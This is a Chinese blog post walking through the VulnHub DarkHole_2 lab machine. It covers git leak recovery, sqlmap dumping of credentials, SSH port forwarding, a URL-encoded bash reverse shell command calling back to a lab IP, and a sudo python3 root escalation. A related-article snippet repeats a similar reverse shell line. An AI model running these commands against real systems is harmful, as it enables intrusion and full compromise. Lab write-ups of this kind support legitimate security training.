DarkHole靶机渗透

最新推荐文章于 2024-04-14 01:04:27 发布
最新推荐文章于 2024-04-14 01:04:27 发布
阅读量317 收藏 1
点赞数
分类专栏: web渗透 文章标签: git github 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44522540/article/details/126618743
版权

一、信息收集

主机发现
一
端口探测,开放了22和80端口
在这里插入图片描述
目录扫描发现git信息泄露
在这里插入图片描述
下载git源码
​python2 GitHack.py http://192.168.226.134/.git
在这里插入图片描述
在这里插入图片描述
将./git下载到本地 wget -r http://192.168.226.134/.git
在这里插入图片描述
git clone .git webapp 创建一个webapp的源码文件,可以在其中执行所有 git 操作。
在这里插入图片描述
在git日志当中存在修改记录,切换到该条记录下 查看登录文件发现账号密码
在这里插入图片描述
登陆后台
在这里插入图片描述

二、漏洞利用

sqlmap -u http://192.168.226.134/dashboard.php?id=1 --cookie=PHPSESSID=n1nklviu5hj7ua488jjvkki1do --dbs
在这里插入图片描述
sqlmap -u http://192.168.226.134/dashboard.php?id=1 --cookie=PHPSESSID=n1nklviu5hj7ua488jjvkki1do -D darkhole_2 --tables
在这里插入图片描述
sqlmap -u http://192.168.226.134/dashboard.php?id=1 --cookie=PHPSESSID=n1nklviu5hj7ua488jjvkki1do -D darkhole_2 -T ssh --dump
在这里插入图片描述
ssh登录:jehad:fool
在这里插入图片描述
查看历史执行命令,执行curl “http://127.0.0.1:9999/?cmd=id”,losy用户
在这里插入图片描述
由于只能本地访问,使用SSH -L本地转发功能,在本地监听一个端口,使用ssh jehad@192.168.226.134 -L 9999:127.0.0.1:9999将目标靶机的本地9999映射到本地9999端口。
在这里插入图片描述
进行url编码执行,开启监听,反弹shell
curl “http://127.0.0.1:9999/?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%32%36%2e%31%32%39%2f%31%32%33%34%20%30%3e%26%31%27”
在这里插入图片描述

三、提权

查询历史命令,cat .bash_history,发现密码
在这里插入图片描述
升级shell python3 -c ‘import pty;pty.spawn(“/bin/bash”)’,可以以root身份执行/usr/bin/python3。
利用sudo /usr/bin/python3 -c 'import os; os.system(“/bin/sh”)'提权
在这里插入图片描述

hana-u
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub DarkHole靶机
qq_39428734的博客
04-13 501
扫描局域网内存活主机 得到靶机IP 使用namp扫描存活靶机开放了哪些端口 得到靶机开放了22,80端口 进入80端口的网页服务 查看网页源代码没有发现任何东西 爆破目录,查看有那些敏感目录 看到了一个配置文件和后台管理界面,登录界面等等 在config目录里面查看到了database.php文件 我们把它下载下来 啥也没有。。 后台管理界面显示没有权限 登录界面中看到了 正式的登录界面 我们去注册界面看看 注册一个用户并登录试试
看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole
Aluxian_的博客
05-30 1704
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
VulnHub-DarkHole_1靶机详细渗透教程
MRS_jianai的博客
12-30 2157
VulnHub-DarkHole:1靶机详细渗透教程
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)(1),2024互联网大厂网络安全面经合集
最新发布
2301_77116622的博客
04-14 1010
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.两款工具达成的效果是一致的,大家自行选择喜欢的工具即可。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3554
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub靶机darkhole
weixin_52450702的博客
11-28 652
vulnhub靶机darkhole
靶场-DarkHole1
weixin_58602402的博客
06-16 304
修改密码进行抓包,发现有个id值,在sql注入输入id为1时返回无权访问,猜测id值代表用户,构造payload修改其它用户的密码。4.切换回到/home/john 文件夹,再次执行./toto,就会启动一个 bash,这个 bash 就会切换 shell。2.发现/home/john/toto,切换到这个位置去执行,返回不同的id。开始进行绕过,直接将后缀改为jpg成功上传,同时找到文件上传的位置。2.通过蚁剑将木马上传,kali开启监听等待上线,反弹失败。7.发现个文件上传,尝试上传发现具有限制。
Vulnhub: DarkHole:1靶机
qq_43884092的博客
06-28 137
越权修改admin用户密码,上传phtml后缀的webshell,环境变量和sudo提权
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1015
一次渗透测试靶机练习
Vulnhub靶机DARKHOLE_ 2
LainWith的博客
09-14 1275
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
靶机darkhole_2
weixin_50339323的博客
09-09 1371
一、信息搜集 1. 获取IP nmap -sP 192.168.8.0/24 获取的IP:192.168.8.139 2. 扫描IP端口服务 nmap -sC -sV 192.168.8.139 3.目录探测: gobuster dir -q -u http://192.168.8.139 -w /usr/share/seclists/Discovery/Web-Content/common.txt 二、漏洞挖掘 1. 进入到网页 访问 192.168.8.139...
DarkHole_2靶机渗透攻略
weixin_47311099的博客
01-12 794
信息收集 主机发现 nmap -sC -sV 192.168.93.0/24 -p- 目标:192.168.93.134 开放22ssh,80http 网站信息收集 并未发现太多信息 但是根据nmap的扫描结果可知,目录192.168.93.134:80/.git/ 存在git泄露。 ​ git泄露漏洞利用 下载git源码 ​python2 GitHack.py http://192.168.93.134/.git ​ ​ 密码逻辑流程 在logon.php中可以发现用户、密码的处理逻辑 ​
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值